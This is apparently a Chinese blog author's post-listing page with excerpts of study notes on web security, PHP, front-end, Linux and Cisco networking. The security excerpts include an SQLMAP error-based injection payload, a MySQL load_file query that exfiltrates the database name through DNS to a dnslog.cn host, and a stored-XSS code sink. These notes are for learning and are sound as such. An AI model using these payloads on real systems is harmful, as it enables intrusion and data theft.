- 博客(54)
- 资源 (8)
- 收藏
- 关注
RSS订阅原创 【Web安全之Java基础】1.基础review
WEB安全之JAVA语言基础Java是一种面向Internet的编程语言,Java受到广大喜爱是因为Java程序可以再Web浏览器中运行。JAVA技术体系平台1. JAVA SE (JAVA Standard Edition)标准版 支持面向桌面级应用(如windows下的应用程序)的java平台,提供了完整的java核心API2. JAVA EE (JAVA ENTREPRISE Edition) 企业版 为开发企业环境下的应用程序提供的一整套解决方
2022-02-24 10:13:40
3531
原创 【存储型XSS】
存储型XSS$input =$_GET['inout'];$code= <<<CODE <textarea>$input</textarea>CODE;
2021-03-05 18:52:46
678
1
原创 【SQLMAP】工具使用
SQLMAP的使用基础使用 -- h 帮助u [是 get的方式]id=1' AND (SELECT 8255 FROM(SELECT COUNT(*),CONCAT(0x7162787a71,(SELECT (ELT(8255=8255,1))),0x7170717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'npKc'='npKcr-缓存路径r多URL测试...
2021-03-02 10:57:18
164
原创 【DNS外带】
DNS_LOG外带 DNSLOG.cn(实际情况中你发现渗透的时候,有布尔型注入,但是很花时间,你有什么别的方法能够加快时间- 解决办法DNS_LOG外带)普通DNS外带http://dnslog.cn/select load_file(concat('\\\\',(select database()),'.tqfkcu.dnslog.cn/abc'))通过16进制编码DNS外带select load_file(concat('\\\\',(select substr..
2021-03-01 10:51:53
747
原创 【伪造IP】【二次注入】【二次编码注入】
伪造IP普通传递&引用传递function addself ($parm){ $parm++; }$a=10;addself($a);echo 'a的值'.$a;#10function addself (&$parm){ $parm++; }$a=10;addself($a);echo 'a的值'.$a;#11Ctrl +ALT+L 恢复自动页面格式化LESS19INSERT INTO `security`.`referers` (`referer
2021-02-28 18:37:40
128
原创 【Audit_Code】SqlMap 01
SQL注入SQL是什么 结构化查询语言,structure query langage.什么是SQL注入SQL要有一个可利用的控制的参数点,这些参数传递给后台如何查看网页文件对应那个路径打印一点东西
2021-02-24 23:33:41
123
原创 【Audit_code 2 】代码审计
数据库服务器1.基础配置打开服务器PhpStudy, 打开数据库图形界面Navicate在数据库里注释的三种方法 -- /**/ #2.数据库复习Navicate F5刷新2.1.创建库UTF8 是有缺陷的,字符集不够完整。所以解决方案是 UTF8mb4.字符与字节的概念在ASCII(美国信息交换标准)码中,一个符号就是一个字符一个字节是8个比特位 0000 0000比特是储存在电脑里最小的单位create database if not exists te
2021-02-22 18:55:17
195
原创 【Audit_code】代码审计01
代码审计01 - 基本的web代码审计 - 对防火墙的认识 - WAF 绕过 - 反病毒anti-virus的绕过 - 学习如何写渗透报告基本的定义: CNVD - 国家安全的漏洞数据库(通用性的中危以上的漏洞 或者使敏感机关的中高危以上的事件) 黑盒 - 看不到源代码 (后端语言 php javascript) 白盒 - 可以看到相应的代码1.信息安全法律法规信息社区 : tools, 先知社区, 零组(资料文库)明确违法的边界,明确绝对不能做的事情明确在挖洞时候
2021-02-20 21:59:55
523
1
原创 【复习作业 HTML-CSS】
HTML在html中,样式表按照应用方式可以分为三种类型,其中不包括(D )。A. 内嵌样式表 B. 行内样式表 C. 外部样式表文件 D. 类样式表1.内联(内嵌)样式 :内联样式就是将css代码直接写进style属性里面.<p style="color:red;font-size:10px">2.内部样式 : 内部样式就是将css代码写在<style>div{ width:250px; height:76px;}</
2021-02-05 23:50:15
2400
原创 【PHP_OOP】 面对对象编程基础2
创建和操作对象创建一个对象我们需要用到new这个关键字用于实例化一个对象<?php$perso = new Personnage; // 我们用Personnage这个类实例化一个对象叫做 $perso调用对象的方法要调用对象,需要使用运算符 -><?php// 声明一个类class Personnage{ private $_force; private $_localisation; private $_experience; private $_
2021-01-21 09:19:14
86
原创 【Javascript 2】
主要功能启动程序Javascript的优势JavaScript 的优点是是我们可以在许多不同的环境中进行编程,但是在每个环境中执行代码的方式都有所不同,有三种不同的环境: JSBin,网页,服务器条件语句let state = true ;if(state){ console.log('很好的连接了');}else{ console.log('丢失连接了');}let state = true ;if(条件1){ console.log('很好的连接了');}else if(
2021-01-20 21:48:09
99
原创 【Javascript】基础知识
JavaScript基础JavaScript是一种所谓的动态类型的 弱类型语言,意味着可以先将变量初始化位数字,然后重新分配为字符串或者其他任何类型的变量,这提供了极大的灵活性基础概念定义:运行在浏览器的脚本语言,是前端和用户的交互问题,包括使用交互和数据交互,浏览器执行. (在页面不刷新的时候能够获取数据: 比如在浏览页面的时候,选择栏选择的选项不同,显示出来的新闻不同,但是并没有刷新页面)特点:1. 可以直接嵌入到HTML文件里2. 跨平台, 前端语言,只要有浏览器,都可以执行3
2021-01-20 11:51:55
133
原创 【PHP_OOP】 面对对象编程基础1
PHP面对对象对象 Objet什么是面对对象?一切都是对象。对象可以理解角色,比如电脑,台灯,椅子。相应的角色具有自己的特征。比如游戏人物,具有力量,位置,经验值和伤害值。除了特征之外,角色还具有一切能力(作用函数):比如殴打另外一个角色,累计经验,移动(这些都是一些规则的集合)。类 class比如蛋糕是对象,那么模具就是类。模具是独一无二的,但是模具可以生产无数的蛋糕。实例实例是实例化类的结果,比如用蛋糕模具生产了一个具体的蛋糕。封装 encapsulatio.
2021-01-14 14:42:59
133
2
原创 【PHP】变量_函数_调用
PHP基础函数全局 局部 静态变量<?php/* 在一个PHP文件中一个函数名只能出现一次 */ #全局变量 $x = 10; function quanju(){ global $x; #全局变量关键字 global echo $x; } quanju(); #局部变量 function jubu(){ /* $x = 20; #行不通 */ $y = 20;
2020-12-24 14:21:07
243
原创 【PHP_之百钱百鸡】
<?php $x ; $y ; $z ; for( $x=0; $x <=20 ; $x++){ /* echo '公鸡上线<br>'; */ for( $y=1 ; $y <=33 ; $y++){ /* echo '母鸡上线<br>'; */ $z= 100 - $x - $y; if( $z
2020-12-23 15:08:07
160
原创 【PHP实现一个计算器】
PHP实现一个计算器<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>计算器</title></head><body > <
2020-12-23 10:41:12
4022
原创 【PHP基础】1
PHP 超文本预处理器LAMP- Linux Apache MySQL PHP 鱼香肉丝搭配基础概念PHP进程服务httpd.exemysqld.exePHP配置文件-APACHE: httpd.exe [D: XAMPP/apache/conf/httpd.conf] 查看默认端口号-mysql :sqld.exe [D: XAMPP/mysql/conf/httpd.conf] 查看默认端口号【不要写中文名字的.php】查看页面F12 - network - 刷新页面:
2020-12-21 11:47:18
165
1
原创 【阶段考试总结】==
一. 选择题(每题2分 共40分)1.在HTML中,CSS样式按照应用方式可以分为三种类型,其中不包括( D)A. 内嵌样式表 B. 行内样式表 C. 外部样式表文件 D. 类样式表2.在HTML中,可以使用( D)标签向网页中插入图片文件A. B. C. D. 3.在HTML中,将表单中INPUT元素的type属性值设置为(B )时,用于创建提交按钮A. reset B. submit C. button D. img4.在制作
2020-12-20 21:25:44
534
原创 【html_test】绝地求生
<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>表格</title> <style> .f{ width...
2020-12-20 21:21:21
145
原创 【CSS_绝地求生】
CSS1.基础概念CSS cascading style sheets,层叠样式表。 使样式和内容分开1.1单位px--像素em--相对单位,表示浏览器的默认2倍% 上一级元素的百分比1.2颜色1. 英语名称2. 十六进制3. rgb(红,绿,蓝) 0-255 0-255 0-2551.3类型1. 行内样式<p style="color:#00055c ;">今天真的好冷啊</p>2. 内嵌样式<head> <style&g
2020-12-19 15:11:37
174
1
原创 【HTML】绝地求生
1.Lamp网站构建1.1基础概念1.1.1LAMP网站的构建 - B/S 架构 【浏览器----服务器】,比如京东,淘宝,知乎 - C/S 架构 【客户端----服务器】,比如微信,QQ,LOLPHP属于B/S结构软件1.1.2网站工作流程- 请求 【浏览器发URL给服务器】 request- 响应 【服务器发资源给浏览器】response1.1.3统一资源定位符URLhttp://www.jd.com/list.html?c=user&a=del&uid=
2020-12-19 11:36:30
1312
1
原创 【HTML基础】概念基础
LAMP网络开发绝妙鱼香肉丝搭配L--------LinuxA-------ApacheM-------MySQLP-------PHP开发架构的划分:B/S(浏览器--------------服务器)C/S(客户端--------------服务器)PHP的开发属于BS结构的(如果买过阿里云的服务器域名,建议使用centos 7.5==,Linux比Windows更加安全)...
2020-12-14 14:09:23
79
原创 Linux_绝地求生TEST
解释/etc/sdb5和/dev/sdb2分别是什么意思/etc/sdb5 -----第二块硬盘的第一个逻辑分区/etc/sdb2 -----第二块硬盘的第二个主分区linux操作系统的启动过程开机自检bios --- MBR引导 ---- GRUB 菜单 ----- 加载内核 -----systemd进程初始化Linux的运行级别分别代表什么意思?0 poweroff.target 关机状态,使用该级别时将会关闭主机1 rescue.target 单用户模式,不需要密码验证即.
2020-12-11 10:34:21
938
1
原创 【Linux进程和任务管理】基础进程知识
进程程序: 保存在外部储存介质中可以执行的机器代码和数据静态集合进程: 在CPU及内存中处于动态执行的计算机程序程序和进程的关系:每个程序启动需要一个或者多个进程进程是实现程序和功能服务的表现形式查看进程命令ps ps auxps -lefps aux |grep vim ps -lef #主要查看进程状态pgrep -l vim # 查询vim 的进程pgrep -u 用户名 # 查询指定的用户相关进程pstree -aup计划任务管理每天早上05
2020-12-10 16:39:00
98
原创 【Linux 磁盘配额LVM管理】
Linux磁盘配额LVM逻辑卷管理LVM是Linux操作系统下的一种逻辑管理磁盘分区的机制。 可以动态调整磁盘的容量。PV(physical volume 物理卷)基本的储存设备创建物理卷时会在分区或是磁盘需要将普通分区/dev/sdb1转成物理卷是需要先将分区类型ID改为8EVG(volume group)卷组卷组是一个或者多个物理卷的集合在卷组内可以动态添加或者删除LV (logical volume)逻辑卷逻辑卷是在卷组上逻辑划分的卷,与物理卷没有关系将逻辑卷的空间安装文件系统
2020-12-09 16:15:40
59
原创 【Linux磁盘管理概述】基础1
Linux磁盘管理基础概述基本命令fdisk -l# 查看分区基本信息fdisk /dev/sdb#进入命令交互界面#p : 查看分区情况 n --------> newl : 列出所有IDt--------------- 1 8ew--------保存partrobe #更新df -th磁盘的物理结构:扇区柱面磁头 : 只有精密的磁头才能持续性高效工作格式化[root@localhost ~]# ls /sbin/mkfs*/sbin/
2020-12-09 11:24:32
114
原创 【Linux 用户和组】基础概念
用户和组用户账号超级用户:普通用户程序用户组组的分类基本组(私有组) 附加组(公共组)组的标识UID 用户表示符 : 用户数字形式的唯一标识符root UID =0程序账户UID =1-499普通用户UID=500-60000GID 组账户标识符:组的数字形式唯一标识root GID =0程序账户组GID =1-499普通用户组GID=500-60000组的相关文件/etc/passwd : 保存用户账户名称,宿主目录,登录shell信息/etc/sh
2020-12-08 20:29:36
146
原创 【Linux文件及服务】基础概念1
1.Linux 文件及服务1.1.文件1.1.1 Linux文件位置文件类型文件作用常见软件包的封装类型源码包优点: 可以改NMP软件安装基础rpm -qpi 列出包的信息rpm -qi 列出未安装包的信息--forece 强制安装低版本软件包-- nodeps 删除软件包时,不检查依赖关系安装指令rpm -ivh 包名主要安装主程序包卸载rpm -e dhcp重建RPM数据库rpm --rebuilddbrpm --i
2020-12-08 19:21:27
87
原创 【Linux基础命令】基础配置命令
Linux基础概念指令2基础指令配置网卡IP> ifconfig eth33 192.168.1.3 netmask 255.255.255.0 192.168.1.254剪切cp 源文件 目标文件或目录 -f 强制执行,当覆盖同名文件时,直接强制复制不提醒 -i 覆盖同名文件时提醒用户确认 -p 复制文件时保持文件权限,属主及标记时间等属性不变 -r 复制目录时必须所需选项, 表示递归复制文件及子文件夹进入 barsh.c 修改个人配置cd barsh
2020-12-08 09:40:25
153
原创 【1】Linux基础知识及命令
1. Linux基础概述基础命令【对初学者的建议】#查看防火墙的状态## systemctl status firewalld #临时关闭防火墙## systemctl stop firewalld#永久停止防火墙## systemctl disable firewalld#临时打开防火墙## systemctl start firewalld#启动防火墙## systemctl enable firewalld对初学者的建议- 将selinux关闭或者宽容模式#查看
2020-12-04 20:50:04
86
原创 【综合复习_网络部分】
网络部分复习Windows部分学习如何查看SID > whoami /userSID 是什么是用户唯一安全标识符,是标识用户、组和计算机帐户的唯一的号码内置用户的分类->和用户相关的账户(Administrator , Guest)->与Windows组件相关联的账户(system, local_service, network service)组的分类->需要人为添加的 - Administrators - Guests - P
2020-12-01 23:35:38
333
原创 【单臂路由实现VLAN通信】
单臂路由概述链路类型交换机连接主机的端口是access交换机连接路由器的额端口是trunk子接口路由器的物理接口可以被划分成多个逻辑接口每一个子接口对应一个VLAN网段的网关int fa0/0.1(config-subif)# encapulation dot1Q 10 //写封装协议(config-subif)# 192.168.1.254 255.255.255.0int fa0/0no sh...
2020-11-25 11:59:20
257
原创 【三层交换机使用与配置】
三层交换机单臂路由产生的问题单臂路由的瓶颈问题单臂路由为网络骨干链路,容易形成瓶颈子接口依赖于物理接口,应用不够灵活Vlan间转发需要查看路由表,造成资源的浪费三层交换机解决方案使用三层交换机实现vlan通信三层交换 = 二层交换+三层路由MLS2-1CEF(双向映射)CEF是一种基于拓扑转发模型转发信息库(FIB)—有点像路由表邻接关系表---- 有点像MAC表Cisco三层交换机配置#在三层交换机上配置的vlan接口为虚拟接口switch#交换机对于
2020-11-25 11:38:31
576
原创 【STP生成树协议&HSRP热备份路由选择协议】
STP 生成树协议当三个交换机相连,会有交换网络环路形成在每个交换机上- 选 根桥 - 选跟口 -Spanning-tree protocol 生成树 协议逻辑上断开环路protocol标准资源消耗收敛速度树的数量STP802.1DLowSlow1PVST+ciscoHighSlow每个vlanRSTP802.1WMediumFast1Rapid PVST+ciscovery Highvery High每个vlan
2020-11-25 08:57:05
696
原创 实验报告【综合实验1】- 实验资源可下载
实验报告【综合实验1】1. 实验拓扑图2.实验要求天津的网络由DHCP-server 分配IP北京的网络由路由器分配IP需要做以太网通道实现全网互通交换机和路由器都可以实现内网管理上海的网关设备位三层交换机,上海的DHCP中服务器做中继3.实验步骤3.1交换机VLAN&以太网链接&VTP协议Switch 1#配置设备名称#Switch(config)#hostname SW_TJ_1#配置VTP服务器#SW_TJ_1(config)#vtp domai
2020-11-23 19:17:46
272
原创 【vtp交换机中继协议】
VTPvlan trunking protocol虚拟局域网中继协议:同步信息的从一点维护整个网络上的vlan的添加,删除,和重命名vtp 域的组成: 具有相同域名,通过trunk连接(一个交换机配置好信息,其他交换机来学习,学习vlan信息而不是端口信息)运行模式服务器模式(server)1. 可以创建,删除,修改vlan2. 学习转发相同域名的vtp通告(交换机之间告诉对方的信息, 比如 创建vlan20 ,告诉别的交换机创建vlan20)客户机模式(client)1.
2020-11-23 14:27:15
204
原创 【VLAN虚拟局域网】概念与实验
1.VLAN 虚拟局域网交换机带来的问题过大的广播域,带宽的浪费过大的MAC表,造成转发率低下存在安全隐患解决办法–>分割广播域(物理分割&逻辑分割)所以VLAN是逻辑分割,很好的解决的需要更多交换机的问题。VLAN 的优点:控制广播增强网络安全性简化网络管理1.1.VLAN 的类型静态VLAN基于端口划分,连接到交换机的某个接口的主机始终属于一个VLAN基于MAC地址,基于时间的==。动态VLAN1.2.VLAN 的范围VLAN ID 范
2020-11-20 10:25:58
296
原创 【第三层网络层IP协议】基础
IPIP地址主机唯一标识,保证主机们正常通信。A类地址:1-126B类地址: 128-191C类地址: 192-223D类地址:224-240E类地址: 241-255
2020-11-18 16:52:44
884
原创 【第二层数据链路层】基础
链路层帧格式&交换机基础数据链路层位于网络层和物理层之间,数据链路层的功能是:1. 数据链路的建立,维护和拆除2. 帧的包装,帧的传输,帧的同步3. 帧的差错恢复4. 流量控制1.MAC地址以太网地址用来识别一个以太网上的单独或者一组设备---------------------------------24比特供应商标识 ------------------------------------------- 24比特 供应商对网卡的唯一编号---- —!-
2020-11-17 18:09:23
314
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人